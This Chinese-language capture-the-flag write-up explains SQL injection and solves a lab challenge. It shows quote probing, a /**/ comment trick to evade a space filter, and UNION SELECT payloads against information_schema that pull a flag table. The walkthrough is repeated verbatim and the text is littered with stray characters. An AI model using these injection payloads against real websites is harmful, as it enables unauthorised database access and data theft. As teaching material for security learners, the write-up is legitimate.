所謂SQL注入,就是通過(guò)把SQL命令插入到Web表單提交或輸入域名或頁(yè)面請(qǐng)求的查詢字符串��,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令��。具體來(lái)說(shuō)�,它是利用現(xiàn)有應(yīng)用程序,將(惡意)的SQL命令注入到后臺(tái)數(shù)據(jù)庫(kù)引擎執(zhí)行的能力����,它可以通過(guò)在Web表單中輸入(惡意)SQL語(yǔ)句得到一個(gè)存在安全漏洞的網(wǎng)站上的數(shù)據(jù)庫(kù),而不是按照設(shè)計(jì)者意圖去執(zhí)行SQL語(yǔ)句�����。比如先前的很多影視網(wǎng)站泄露VIP會(huì)員密碼大多就是通過(guò)WEB表單遞交查詢字符暴出的��,這類表單特別容易受到sql注入攻擊�。
分別輸入1,2,3有對(duì)應(yīng)的結(jié)果
使用'會(huì)報(bào)錯(cuò),于是
構(gòu)造常用的sql語(yǔ)句:1' and '1'='1
沒(méi)有反應(yīng)試一試1' and '1'='2
還是沒(méi)反應(yīng)��,工具提示,應(yīng)該是過(guò)濾了什么��,改一下sql語(yǔ)句試一試
1and1=1
可以顯示東西��,經(jīng)過(guò)判斷過(guò)濾了空格����,我們使用/**/來(lái)代替空格
試一試1'/**/and/**/'1'='1
發(fā)現(xiàn)有結(jié)果了:
于是構(gòu)建sql語(yǔ)句:
判斷有那些數(shù)據(jù)庫(kù):
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
可以看到結(jié)果:
查看有哪些數(shù)據(jù)表:
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
發(fā)現(xiàn)了flag的表,我們猜測(cè)應(yīng)該是在web1數(shù)據(jù)庫(kù)中并且字段就是flag(其實(shí)就在本頁(yè)面的數(shù)據(jù)庫(kù)中)
故:
1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
本人也是初學(xué)者����,參考了許多大佬的wp 自己寫出來(lái)后有什么錯(cuò)誤的地方����,希望大家指出,謝謝!
根據(jù)頁(yè)面提示����,到底過(guò)濾了什么東西?可以知道一定過(guò)濾了什么....
分別輸入1,2,3有對(duì)應(yīng)的結(jié)果
使用'會(huì)報(bào)錯(cuò),于是
構(gòu)造常用的sql語(yǔ)句:1' and '1'='1
沒(méi)有反應(yīng)試一試1' and '1'='2
還是沒(méi)反應(yīng)���,工具提示�����,應(yīng)該是過(guò)濾了什么�,改一下sql語(yǔ)句試一試
1and1=1
可以顯示東西,經(jīng)過(guò)判斷過(guò)濾了空格����,我們使用/**/來(lái)代替空格
試一試1'/**/and/**/'1'='1
發(fā)現(xiàn)有結(jié)果了:
于是構(gòu)建sql語(yǔ)句:
判斷有那些數(shù)據(jù)庫(kù):
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
可以看到結(jié)果:
查看有哪些數(shù)據(jù)表:
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
發(fā)現(xiàn)了flag的表,我們猜測(cè)應(yīng)該是在web1數(shù)據(jù)庫(kù)中并且字段就是flag(其實(shí)就在本頁(yè)面的數(shù)據(jù)庫(kù)中)
故:
1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
總結(jié)
以上所述是小編給大家介紹的一個(gè)簡(jiǎn)單的sql注入���,希望對(duì)大家有所幫助�,如果大家有任何疑問(wèn)請(qǐng)給我留言���,小編會(huì)及時(shí)回復(fù)大家的�����。在此也非常感謝大家對(duì)腳本之家網(wǎng)站的支持�����!
您可能感興趣的文章:- Java面試題解析之判斷以及防止SQL注入
- SQL注入原理與解決方法代碼示例
- 通過(guò)ibatis解決sql注入問(wèn)題
- Win2003服務(wù)器防SQL注入神器--D盾_IIS防火墻
- Sql注入工具_(dá)動(dòng)力節(jié)點(diǎn)Java學(xué)院整理
- Sql注入原理簡(jiǎn)介_動(dòng)力節(jié)點(diǎn)Java學(xué)院整理
- 尋找sql注入的網(wǎng)站的方法(必看)
- Mybatis防止sql注入的實(shí)例
- Hibernate使用中防止SQL注入的幾種方案
- 有效防止SQL注入的5種方法總結(jié)
- 關(guān)于SQL注入中文件讀寫的方法總結(jié)
- 深入了解SQL注入
